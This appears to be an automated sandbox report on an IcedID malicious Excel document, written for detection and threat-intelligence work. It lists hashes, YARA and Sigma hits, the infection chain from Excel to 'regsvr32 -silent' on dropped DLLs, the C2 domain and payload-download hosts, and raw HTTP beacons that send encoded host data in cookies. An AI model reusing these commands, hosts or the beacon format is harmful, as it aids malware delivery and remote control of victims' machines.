Windows Analysis Report DeliveryConf535215.xlsm

Overview

General Information

Sample Name: DeliveryConf535215.xlsm
Analysis ID: 444679
MD5: dcd1fa0b71a3bb9c11cf0899a6b3addb
SHA1: 894e9de6e6aa9796236523697905baf0a6c7282d
SHA256: 50d9eefeb3f4c066d06dfc84c1f4d2576f1544eeb85d2c9940f6b0932a77dcde
Tags: IcedID, xlsm

Detection

IcedID
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Document exploit detected (creates forbidden files)
Document exploit detected (drops PE files)
Found malware configuration
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
System process connects to network (likely due to code injection or exploit)
Yara detected IcedID
C2 URLs / IPs found in malware configuration
Contains functionality to detect hardware virtualization (CPUID execution measurement)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Drops PE files to the user root directory
Office process drops PE file
Sigma detected: Microsoft Office Product Spawning Windows Shell
Tries to detect virtualization through RDTSC time measurements
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to query network adapter information
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Drops files with a non-matching file extension (content does not match file extension)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
JA3 SSL client fingerprint seen in connection with other malware
PE file contains an invalid checksum
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Registers a DLL
Uses a known web browser user agent for HTTP communication
Uses insecure TLS / SSL version for HTTPS connection
Yara signature match

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 1296 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
    • regsvr32.exe (PID: 3060 cmdline: regsvr32 -silent ..\XRAY.dll MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 1920 cmdline: regsvr32 -silent ..\XTOWN.dll MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 2308 cmdline: regsvr32 -silent ..\XZIBIT.dll MD5: 59BCE9F07985F8A4204F4D6554CFF708)
  • cleanup

Malware Configuration

Threatname: IcedID

{"Campaign ID": 3565085024, "C2 url": "astrocycle.download"}

Yara Overview

PCAP (Network Traffic)

Source | Rule | Description | Author | Strings
dump.pcap | JoeSecurity_IcedID_1 | Yara detected IcedID | Joe Security

    Memory Dumps

    Source | Rule | Description | Author | Strings
    00000003.00000002.2101910318.0000000000290000.00000004.00000001.sdmp | MAL_IcedID_GZIP_LDR_202104 | 2021 initial Bokbot / Icedid loader for fake GZIP payloads | Thomas Barabosch, Telekom Security
    • 0x27c6:$internal_name: loader_dll_64.dll
    • 0x30b4:$string0: _gat=
    • 0x3114:$string1: _ga=
    • 0x30ec:$string2: _gid=
    • 0x30cc:$string3: _u=
    • 0x3026:$string4: _io=
    • 0x30d8:$string5: GetAdaptersInfo
    • 0x2b16:$string6: WINHTTP.dll
    • 0x27ea:$string7: DllRegisterServer
    • 0x27fc:$string8: PluginInit
    • 0x3080:$string9: POST
    • 0x3140:$string10: aws.amazon.com
    00000004.00000002.2111691413.00000000003E7000.00000004.00000020.sdmp | JoeSecurity_IcedID_1 | Yara detected IcedID | Joe Security
    00000003.00000002.2101851829.00000000001FD000.00000004.00000020.sdmp | JoeSecurity_IcedID_1 | Yara detected IcedID | Joe Security
    00000004.00000002.2109602309.0000000000110000.00000004.00000001.sdmp | MAL_IcedID_GZIP_LDR_202104 | 2021 initial Bokbot / Icedid loader for fake GZIP payloads | Thomas Barabosch, Telekom Security
        • 0x27c6:$internal_name: loader_dll_64.dll
        • 0x30b4:$string0: _gat=
        • 0x3114:$string1: _ga=
        • 0x30ec:$string2: _gid=
        • 0x30cc:$string3: _u=
        • 0x3026:$string4: _io=
        • 0x30d8:$string5: GetAdaptersInfo
        • 0x2b16:$string6: WINHTTP.dll
        • 0x27ea:$string7: DllRegisterServer
        • 0x27fc:$string8: PluginInit
        • 0x3080:$string9: POST
        • 0x3140:$string10: aws.amazon.com
        00000005.00000002.2116608760.0000000000110000.00000004.00000001.sdmp | MAL_IcedID_GZIP_LDR_202104 | 2021 initial Bokbot / Icedid loader for fake GZIP payloads | Thomas Barabosch, Telekom Security
        • 0x27c6:$internal_name: loader_dll_64.dll
        • 0x30b4:$string0: _gat=
        • 0x3114:$string1: _ga=
        • 0x30ec:$string2: _gid=
        • 0x30cc:$string3: _u=
        • 0x3026:$string4: _io=
        • 0x30d8:$string5: GetAdaptersInfo
        • 0x2b16:$string6: WINHTTP.dll
        • 0x27ea:$string7: DllRegisterServer
        • 0x27fc:$string8: PluginInit
        • 0x3080:$string9: POST
        • 0x3140:$string10: aws.amazon.com

        Unpacked PEs

        Source | Rule | Description | Author | Strings
        4.2.regsvr32.exe.110000.0.unpack | MAL_IcedID_GZIP_LDR_202104 | 2021 initial Bokbot / Icedid loader for fake GZIP payloads | Thomas Barabosch, Telekom Security
        • 0x1bc6:$internal_name: loader_dll_64.dll
        • 0x1f16:$string6: WINHTTP.dll
        • 0x1bea:$string7: DllRegisterServer
        • 0x1bfc:$string8: PluginInit
        3.2.regsvr32.exe.20d0000.4.unpack | MAL_IcedID_GZIP_LDR_202104 | 2021 initial Bokbot / Icedid loader for fake GZIP payloads | Thomas Barabosch, Telekom Security
        • 0x27c6:$internal_name: loader_dll_64.dll
        • 0x30bc:$string0: _gat=
        • 0x311c:$string1: _ga=
        • 0x30f4:$string2: _gid=
        • 0x30d4:$string3: _u=
        • 0x302e:$string4: _io=
        • 0x30e0:$string5: GetAdaptersInfo
        • 0x2b16:$string6: WINHTTP.dll
        • 0x27ea:$string7: DllRegisterServer
        • 0x27fc:$string8: PluginInit
        • 0x3088:$string9: POST
        • 0x3148:$string10: aws.amazon.com
        4.2.regsvr32.exe.130000.1.unpack | MAL_IcedID_GZIP_LDR_202104 | 2021 initial Bokbot / Icedid loader for fake GZIP payloads | Thomas Barabosch, Telekom Security
        • 0x27c6:$internal_name: loader_dll_64.dll
        • 0x30bc:$string0: _gat=
        • 0x311c:$string1: _ga=
        • 0x30f4:$string2: _gid=
        • 0x30d4:$string3: _u=
        • 0x302e:$string4: _io=
        • 0x30e0:$string5: GetAdaptersInfo
        • 0x2b16:$string6: WINHTTP.dll
        • 0x27ea:$string7: DllRegisterServer
        • 0x27fc:$string8: PluginInit
        • 0x3088:$string9: POST
        • 0x3148:$string10: aws.amazon.com
        3.2.regsvr32.exe.290000.0.unpack | MAL_IcedID_GZIP_LDR_202104 | 2021 initial Bokbot / Icedid loader for fake GZIP payloads | Thomas Barabosch, Telekom Security
        • 0x1bc6:$internal_name: loader_dll_64.dll
        • 0x1f16:$string6: WINHTTP.dll
        • 0x1bea:$string7: DllRegisterServer
        • 0x1bfc:$string8: PluginInit
        5.2.regsvr32.exe.110000.0.raw.unpack | MAL_IcedID_GZIP_LDR_202104 | 2021 initial Bokbot / Icedid loader for fake GZIP payloads | Thomas Barabosch, Telekom Security
        • 0x27c6:$internal_name: loader_dll_64.dll
        • 0x30b4:$string0: _gat=
        • 0x3114:$string1: _ga=
        • 0x30ec:$string2: _gid=
        • 0x30cc:$string3: _u=
        • 0x3026:$string4: _io=
        • 0x30d8:$string5: GetAdaptersInfo
        • 0x2b16:$string6: WINHTTP.dll
        • 0x27ea:$string7: DllRegisterServer
        • 0x27fc:$string8: PluginInit
        • 0x3080:$string9: POST
        • 0x3140:$string10: aws.amazon.com

        Sigma Overview

        System Summary:

        Sigma detected: Microsoft Office Product Spawning Windows Shell
        Source: Process started, Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: regsvr32 -silent ..\XRAY.dll, CommandLine: regsvr32 -silent ..\XRAY.dll, CommandLine|base64offset|contains: ,, Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 1296, ProcessCommandLine: regsvr32 -silent ..\XRAY.dll, ProcessId: 3060

        Jbx Signature Overview

        AV Detection:

        Found malware configuration
        Source: 3.2.regsvr32.exe.20d0000.4.unpack, Malware Configuration Extractor: IcedID {"Campaign ID": 3565085024, "C2 url": "astrocycle.download"}
        Yara detected IcedID
        Source: Yara match, File source: dump.pcap, type: PCAP
        Source: Yara match, File source: 00000004.00000002.2111691413.00000000003E7000.00000004.00000020.sdmp, type: MEMORY
        Source: Yara match, File source: 00000003.00000002.2101851829.00000000001FD000.00000004.00000020.sdmp, type: MEMORY
        Source: Yara match, File source: 00000004.00000002.2111724951.0000000000407000.00000004.00000020.sdmp, type: MEMORY
        Source: Yara match, File source: 00000005.00000002.2117952085.00000000028A4000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match, File source: 00000005.00000002.2116809079.0000000000467000.00000004.00000020.sdmp, type: MEMORY
        Source: Yara match, File source: Process Memory Space: regsvr32.exe PID: 2308, type: MEMORY
        Source: Yara match, File source: Process Memory Space: regsvr32.exe PID: 3060, type: MEMORY
        Source: Yara match, File source: Process Memory Space: regsvr32.exe PID: 1920, type: MEMORY
        Source: unknown, HTTPS traffic detected: 13.224.92.73:443 -> 192.168.2.22:49170 version: TLS 1.0
        Source: unknown, HTTPS traffic detected: 13.224.92.73:443 -> 192.168.2.22:49172 version: TLS 1.0
        Source: unknown, HTTPS traffic detected: 13.224.92.73:443 -> 192.168.2.22:49174 version: TLS 1.0
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

        Software Vulnerabilities:

        Document exploit detected (creates forbidden files)
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, File created: C:\Users\user\XRAY.dll
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, File created: C:\Users\user\XTOWN.dll
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, File created: C:\Users\user\XZIBIT.dll
        Document exploit detected (drops PE files)
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, File created: lsdfik[1].fml.0.dr
        Document exploit detected (UrlDownloadToFile)
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA
        Document exploit detected (process start blacklist hit)
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Process created: C:\Windows\System32\regsvr32.exe
        Source: global traffic, DNS query: name: thousandsyears.download
        Source: global traffic, TCP traffic: 192.168.2.22:49170 -> 13.224.92.73:443
        Source: global traffic, TCP traffic: 192.168.2.22:49167 -> 172.67.198.51:80

        Networking:

        C2 URLs / IPs found in malware configuration
        Source: Malware configuration extractor, URLs: astrocycle.download
        Source: global traffic, HTTP traffic detected: HTTP/1.1 200 OK
          Date: Tue, 06 Jul 2021 13:07:24 GMT
          Content-Type: application/octet-stream
          Content-Length: 57856
          Connection: keep-alive
          Content-Disposition: attachment; filename=lsdfik.fml
          Cache-Control: max-age=14400
          CF-Cache-Status: HIT
          Age: 4274
          Accept-Ranges: bytes
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=VmvIn%2Bt8%2B%2Ba%2BScS%2FFU7rDNbdB4WhaK8GW%2F4tLDa5Y6N6ikv7oKqorLg9y1o%2Bo%2Bk1gOD%2FvsRhWJxxpzT1vTrLYdrRIy3DXL3BZlXJM6eVgPsCSrit2ZzKB%2B7T3%2BL3Ywtv19W0rJU%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 66a90e4d9f024e3d-FRA
          alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
        Source: global traffic, HTTP traffic detected: HTTP/1.1 200 OK
          Date: Tue, 06 Jul 2021 13:07:24 GMT
          Content-Type: application/octet-stream
          Content-Length: 57856
          Connection: keep-alive
          Content-Disposition: attachment; filename=lsdfik.fml
          Cache-Control: max-age=14400
          CF-Cache-Status: HIT
          Age: 4273
          Accept-Ranges: bytes
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=s%2B8FAtNhnjQzr1O8UP9iUO08DcT1KxsaDvc7eha2EOsf1s2GNo8RKQERM9jS3FZgVQ56Yn9dYcZukmUANQD1gRcSFb5LWxl8mpfkjQj5s7CRS2qvwxr%2BerTCPw%3D%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 66a90e4f1fd42c22-FRA
          alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
        Source: global traffic, HTTP traffic detected: HTTP/1.1 200 OK
          Date: Tue, 06 Jul 2021 13:07:24 GMT
          Content-Type: application/octet-stream
          Content-Length: 57856
          Connection: keep-alive
          Content-Disposition: attachment; filename=lsdfik.fml
          Cache-Control: max-age=14400
          CF-Cache-Status: HIT
          Age: 4272
          Accept-Ranges: bytes
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=HxS6DVkhc1ZhRsctA4%2B4wRcXNfsXPSjIis2vJtDaAwWpiBqHwotxFztLYL%2B0PI3TPlFoVoVaXUfSfgm1bcUzX%2FeCFmdgedKItMbt9fWiw3XeisseZQAYXFiKEB4%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 66a90e50ca8c2c2a-FRA
          alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
        Source: global traffic, HTTP traffic detected: GET / HTTP/1.1
          Connection: Keep-Alive
          Cookie: __gads=3565085024:1:7080:54; _gat=6.1.7601.64; _ga=1.329303.0.5; _u=313739363035:416C627573:31384337383432373833324243433531; __io=0; _gid=67AFEDC5AC03
          Host: astrocycle.download
        Source: global traffic, HTTP traffic detected: GET / HTTP/1.1
          Connection: Keep-Alive
          Cookie: __gads=3565085024:1:7084:53; _gat=6.1.7601.64; _ga=1.329303.0.5; _u=313739363035:416C627573:39463142354243374539333138353931; __io=0; _gid=67AFEDC5AC03
          Host: astrocycle.download
        Source: global traffic, HTTP traffic detected: GET / HTTP/1.1
          Connection: Keep-Alive
          Cookie: __gads=3565085024:1:7088:53; _gat=6.1.7601.64; _ga=1.329303.0.5; _u=313739363035:416C627573:37454443394536333630373541353235; __io=0; _gid=67AFEDC5AC03
          Host: astrocycle.download
        Source: Joe Sandbox View, JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
        Source: global traffic, HTTP traffic detected: GET /div/44376,8555986111.jpg HTTP/1.1
          Accept: */*
          UA-CPU: AMD64
          Accept-Encoding: gzip, deflate
          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
          Host: thousandsyears.download
          Connection: Keep-Alive
        Source: global traffic, HTTP traffic detected: GET /div/44376,8555986111.jpg HTTP/1.1
          Accept: */*
          UA-CPU: AMD64
          Accept-Encoding: gzip, deflate
          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
          Host: voopeople.fun
          Connection: Keep-Alive
        Source: global traffic, HTTP traffic detected: GET /div/44376,8555986111.jpg HTTP/1.1
          Accept: */*
          UA-CPU: AMD64
          Accept-Encoding: gzip, deflate
          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
          Host: uppercilio.fun
          Connection: Keep-Alive
        Source: unknown, HTTPS traffic detected: 13.224.92.73:443 -> 192.168.2.22:49170 version: TLS 1.0
        Source: unknown, HTTPS traffic detected: 13.224.92.73:443 -> 192.168.2.22:49172 version: TLS 1.0
        Source: unknown, HTTPS traffic detected: 13.224.92.73:443 -> 192.168.2.22:49174 version: TLS 1.0
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A04F74AC.png
        Source: regsvr32.exe, 00000003.00000002.2102922360.0000000002B92000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmp, String found in binary or memory: <a class="lb-txt-none lb-txt-p-chromium lb-none-pad lb-none-v-margin lb-txt" style="padding-right:5px;" href="https://www.facebook.com/amazonwebservices" target="_blank" rel="noopener" title="Facebook"> <i class="icon-facebook"></i></a> equals www.facebook.com (Facebook)
        Source: regsvr32.exe, 00000003.00000002.2102922360.0000000002B92000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmp, String found in binary or memory: <a class="lb-txt-none lb-txt-p-chromium lb-none-pad lb-txt" style="padding-right:5px;" href="https://www.youtube.com/user/AmazonWebServices/Cloud/" target="_blank" rel="noopener" title="YouTube"> <i class="icon-youtube"></i></a> equals www.youtube.com (Youtube)
        Source: regsvr32.exe, 00000003.00000002.2103466805.00000000031B0000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
        Source: regsvr32.exe, 00000004.00000003.2106480345.000000000303C000.00000004.00000001.sdmpString found in binary or memory: X-Amz-Cf-Idcj6kWJATGVaRS6cLhRSi4YOg3P7Y7NWCZgSKUGsKMvLB0-w177VmJQ==X-Amz-Cf-PopZRH50-C1X-CacheMiss from cloudfrontPermissions-Policyinterest-cohort=()Content-Security-Policy-Report-Onlydefault-src 'self' data: https://a0.awsstatic.com; connect-src 'self' https://112-tzm-766.mktoresp.com https://112-tzm-766.mktoutil.com https://a0.awsstatic.com https://a0.p.awsstatic.com https://a1.awsstatic.com https://amazonwebservices.d2.sc.omtrdc.net https://amazonwebservicesinc.tt.omtrdc.net https://api.regional-table.region-services.aws.a2z.com https://api.us-west-2.prod.pricing.aws.a2z.com https://b0.p.awsstatic.com https://c0.b0.p.awsstatic.com https://calculator.aws https://d0.awsstatic.com https://d1.awsstatic.com https://d1fgizr415o1r6.cloudfront.net https://d3borx6sfvnesb.cloudfront.net https://dc.ads.linkedin.com https://dftu77xade0tc.cloudfront.net https://dpm.demdex.net https://fls-na.amazon.com https://googleads.g.doubleclick.net https://i18n-string.us-west-2.prod.pricing.aws.a2z.com https://prod.log.shortbread.aws.dev https://prod.tools.shortbread.aws.dev https://s0.awsstatic.com https://s3.amazonaws.com/aws-messaging-pricing-information/ https://s3.amazonaws.com/public-pricing-agc/ https://spot-bid-advisor.s3.amazonaws.com https://view-stage.us-west-2.prod.pricing.aws.a2z.com https://view-staging.us-east-1.prod.plc1-prod.pricing.aws.a2z.com https://www.youtube-nocookie.com; font-src 'self' data: https://a0.awsstatic.com https://f0.awsstatic.com https://fonts.gstatic.com; frame-src 'self' https://c0.b0.p.awsstatic.com https://calculator.aws https://dpm.demdex.net https://www.youtube-nocookie.com; img-src 'self' data: https://*.ads.linkedin.com https://*.vidyard.com https://*.ytimg.com https://a0.awsstatic.com https://amazonwebservices.d2.sc.omtrdc.net https://aws-quickstart.s3.amazonaws.com https://awsmedia.s3.amazonaws.com 
https://d1.awsstatic-china.com https://d1.awsstatic.com https://d2908q01vomqb2.cloudfront.net https://d36cz9buwru1tt.cloudfront.net https://docs.aws.amazon.com https://dpm.demdex.net https://fls-na.amazon.com https://googleads.g.doubleclick.net https://img.youtube.com https://marketingplatform.google.com https://media.amazonwebservices.com https://p.adsymptotic.com https://pages.awscloud.com https://s3.amazonaws.com/aws-quickstart/ https://ssl-static.libsyn.com https://static-cdn.jtvnw.net https://www.google.com https://www.linkedin.com https://yt3.ggpht.com; media-src 'self' https://*.libsyn.com https://a0.awsstatic.com https://anchor.fm https://awsmedia.s3.amazonaws.com https://awspodcastsiberiaent.s3.eu-west-3.amazonaws.com https://chtbl.com https://d1.awsstatic.com https://d1hemuljm71t2j.cloudfront.net https://d1le29qyzha1u4.cloudfront.net https://d1oqpvwii7b6rh.cloudfront.net https://d1vo51ubqkiilx.cloudfront.net https://d1yyh5dhdgifnx.cloudfront.net https://d2908q01vomqb2.cloudfront.net https://d2a6igt6jhaluh.cloudfront.net https://d3ctxlq1ktw2nl.cloudfront.net https://d3h2ozso0dirfl.cloudfront.net https://dgen8gghn3u86.c
        Source: regsvr32.exe, 00000004.00000003.2106480345.000000000303C000.00000004.00000001.sdmpString found in binary or memory: X-Amz-Cf-Idcj6kWJATGVaRS6cLhRSi4YOg3P7Y7NWCZgSKUGsKMvLB0-w177VmJQ==X-Amz-Cf-PopZRH50-C1X-CacheMiss from cloudfrontPermissions-Policyinterest-cohort=()Content-Security-Policy-Report-Onlydefault-src 'self' data: https://a0.awsstatic.com; connect-src 'self' https://112-tzm-766.mktoresp.com https://112-tzm-766.mktoutil.com https://a0.awsstatic.com https://a0.p.awsstatic.com https://a1.awsstatic.com https://amazonwebservices.d2.sc.omtrdc.net https://amazonwebservicesinc.tt.omtrdc.net https://api.regional-table.region-services.aws.a2z.com https://api.us-west-2.prod.pricing.aws.a2z.com https://b0.p.awsstatic.com https://c0.b0.p.awsstatic.com https://calculator.aws https://d0.awsstatic.com https://d1.awsstatic.com https://d1fgizr415o1r6.cloudfront.net https://d3borx6sfvnesb.cloudfront.net https://dc.ads.linkedin.com https://dftu77xade0tc.cloudfront.net https://dpm.demdex.net https://fls-na.amazon.com https://googleads.g.doubleclick.net https://i18n-string.us-west-2.prod.pricing.aws.a2z.com https://prod.log.shortbread.aws.dev https://prod.tools.shortbread.aws.dev https://s0.awsstatic.com https://s3.amazonaws.com/aws-messaging-pricing-information/ https://s3.amazonaws.com/public-pricing-agc/ https://spot-bid-advisor.s3.amazonaws.com https://view-stage.us-west-2.prod.pricing.aws.a2z.com https://view-staging.us-east-1.prod.plc1-prod.pricing.aws.a2z.com https://www.youtube-nocookie.com; font-src 'self' data: https://a0.awsstatic.com https://f0.awsstatic.com https://fonts.gstatic.com; frame-src 'self' https://c0.b0.p.awsstatic.com https://calculator.aws https://dpm.demdex.net https://www.youtube-nocookie.com; img-src 'self' data: https://*.ads.linkedin.com https://*.vidyard.com https://*.ytimg.com https://a0.awsstatic.com https://amazonwebservices.d2.sc.omtrdc.net https://aws-quickstart.s3.amazonaws.com https://awsmedia.s3.amazonaws.com 
https://d1.awsstatic-china.com https://d1.awsstatic.com https://d2908q01vomqb2.cloudfront.net https://d36cz9buwru1tt.cloudfront.net https://docs.aws.amazon.com https://dpm.demdex.net https://fls-na.amazon.com https://googleads.g.doubleclick.net https://img.youtube.com https://marketingplatform.google.com https://media.amazonwebservices.com https://p.adsymptotic.com https://pages.awscloud.com https://s3.amazonaws.com/aws-quickstart/ https://ssl-static.libsyn.com https://static-cdn.jtvnw.net https://www.google.com https://www.linkedin.com https://yt3.ggpht.com; media-src 'self' https://*.libsyn.com https://a0.awsstatic.com https://anchor.fm https://awsmedia.s3.amazonaws.com https://awspodcastsiberiaent.s3.eu-west-3.amazonaws.com https://chtbl.com https://d1.awsstatic.com https://d1hemuljm71t2j.cloudfront.net https://d1le29qyzha1u4.cloudfront.net https://d1oqpvwii7b6rh.cloudfront.net https://d1vo51ubqkiilx.cloudfront.net https://d1yyh5dhdgifnx.cloudfront.net https://d2908q01vomqb2.cloudfront.net https://d2a6igt6jhaluh.cloudfront.net https://d3ctxlq1ktw2nl.cloudfront.net https://d3h2ozso0dirfl.cloudfront.net https://dgen8gghn3u86.c
        Source: regsvr32.exe, 00000004.00000002.2113610800.0000000003030000.00000004.00000001.sdmpString found in binary or memory: bsyn.com https://static-cdn.jtvnw.net https://www.google.com https://www.linkedin.com https://yt3.ggpht.com; media-src 'self' https://*.libsyn.com https://a0.awsstatic.com https://anchor.fm https://awsmedia.s3.amazonaws.com https://awspodcastsiberiaent.s3.eu-west-3.amazonaws.com https://chtbl.com https://d1.awsstatic.com https://d1hemuljm71t2j.cloudfront.net https://d1le29qyzha1u4.cloudfront.net https://d1oqpvwii7b6rh.cloudfront.net https://d1vo51ubqkiilx.cloudfront.net https://d1yyh5dhdgifnx.cloudfront.net https://d2908q01vomqb2.cloudfront.net https:/ equals www.linkedin.com (Linkedin)
        Source: regsvr32.exe, 00000004.00000003.2106480345.000000000303C000.00000004.00000001.sdmpString found in binary or memory: default-src 'self' data: https://a0.awsstatic.com; connect-src 'self' https://112-tzm-766.mktoresp.com https://112-tzm-766.mktoutil.com https://a0.awsstatic.com https://a0.p.awsstatic.com https://a1.awsstatic.com https://amazonwebservices.d2.sc.omtrdc.net https://amazonwebservicesinc.tt.omtrdc.net https://api.regional-table.region-services.aws.a2z.com https://api.us-west-2.prod.pricing.aws.a2z.com https://b0.p.awsstatic.com https://c0.b0.p.awsstatic.com https://calculator.aws https://d0.awsstatic.com https://d1.awsstatic.com https://d1fgizr415o1r6.cloudfront.net https://d3borx6sfvnesb.cloudfront.net https://dc.ads.linkedin.com https://dftu77xade0tc.cloudfront.net https://dpm.demdex.net https://fls-na.amazon.com https://googleads.g.doubleclick.net https://i18n-string.us-west-2.prod.pricing.aws.a2z.com https://prod.log.shortbread.aws.dev https://prod.tools.shortbread.aws.dev https://s0.awsstatic.com https://s3.amazonaws.com/aws-messaging-pricing-information/ https://s3.amazonaws.com/public-pricing-agc/ https://spot-bid-advisor.s3.amazonaws.com https://view-stage.us-west-2.prod.pricing.aws.a2z.com https://view-staging.us-east-1.prod.plc1-prod.pricing.aws.a2z.com https://www.youtube-nocookie.com; font-src 'self' data: https://a0.awsstatic.com https://f0.awsstatic.com https://fonts.gstatic.com; frame-src 'self' https://c0.b0.p.awsstatic.com https://calculator.aws https://dpm.demdex.net https://www.youtube-nocookie.com; img-src 'self' data: https://*.ads.linkedin.com https://*.vidyard.com https://*.ytimg.com https://a0.awsstatic.com https://amazonwebservices.d2.sc.omtrdc.net https://aws-quickstart.s3.amazonaws.com https://awsmedia.s3.amazonaws.com https://d1.awsstatic-china.com https://d1.awsstatic.com https://d2908q01vomqb2.cloudfront.net https://d36cz9buwru1tt.cloudfront.net https://docs.aws.amazon.com https://dpm.demdex.net 
https://fls-na.amazon.com https://googleads.g.doubleclick.net https://img.youtube.com https://marketingplatform.google.com https://media.amazonwebservices.com https://p.adsymptotic.com https://pages.awscloud.com https://s3.amazonaws.com/aws-quickstart/ https://ssl-static.libsyn.com https://static-cdn.jtvnw.net https://www.google.com https://www.linkedin.com https://yt3.ggpht.com; media-src 'self' https://*.libsyn.com https://a0.awsstatic.com https://anchor.fm https://awsmedia.s3.amazonaws.com https://awspodcastsiberiaent.s3.eu-west-3.amazonaws.com https://chtbl.com https://d1.awsstatic.com https://d1hemuljm71t2j.cloudfront.net https://d1le29qyzha1u4.cloudfront.net https://d1oqpvwii7b6rh.cloudfront.net https://d1vo51ubqkiilx.cloudfront.net https://d1yyh5dhdgifnx.cloudfront.net https://d2908q01vomqb2.cloudfront.net https://d2a6igt6jhaluh.cloudfront.net https://d3ctxlq1ktw2nl.cloudfront.net https://d3h2ozso0dirfl.cloudfront.net https://dgen8gghn3u86.cloudfront.net https://dk261l6wntthl.cloudfront.net https://download.stormacq.com/aws/podcast/ https://dts.podtrac.com https://media.amazonwebservices.com https://mktg-apac.s3-ap-southea
        Source: regsvr32.exe, 00000004.00000003.2106480345.000000000303C000.00000004.00000001.sdmpString found in binary or memory: default-src 'self' data: https://a0.awsstatic.com; connect-src 'self' https://112-tzm-766.mktoresp.com https://112-tzm-766.mktoutil.com https://a0.awsstatic.com https://a0.p.awsstatic.com https://a1.awsstatic.com https://amazonwebservices.d2.sc.omtrdc.net https://amazonwebservicesinc.tt.omtrdc.net https://api.regional-table.region-services.aws.a2z.com https://api.us-west-2.prod.pricing.aws.a2z.com https://b0.p.awsstatic.com https://c0.b0.p.awsstatic.com https://calculator.aws https://d0.awsstatic.com https://d1.awsstatic.com https://d1fgizr415o1r6.cloudfront.net https://d3borx6sfvnesb.cloudfront.net https://dc.ads.linkedin.com https://dftu77xade0tc.cloudfront.net https://dpm.demdex.net https://fls-na.amazon.com https://googleads.g.doubleclick.net https://i18n-string.us-west-2.prod.pricing.aws.a2z.com https://prod.log.shortbread.aws.dev https://prod.tools.shortbread.aws.dev https://s0.awsstatic.com https://s3.amazonaws.com/aws-messaging-pricing-information/ https://s3.amazonaws.com/public-pricing-agc/ https://spot-bid-advisor.s3.amazonaws.com https://view-stage.us-west-2.prod.pricing.aws.a2z.com https://view-staging.us-east-1.prod.plc1-prod.pricing.aws.a2z.com https://www.youtube-nocookie.com; font-src 'self' data: https://a0.awsstatic.com https://f0.awsstatic.com https://fonts.gstatic.com; frame-src 'self' https://c0.b0.p.awsstatic.com https://calculator.aws https://dpm.demdex.net 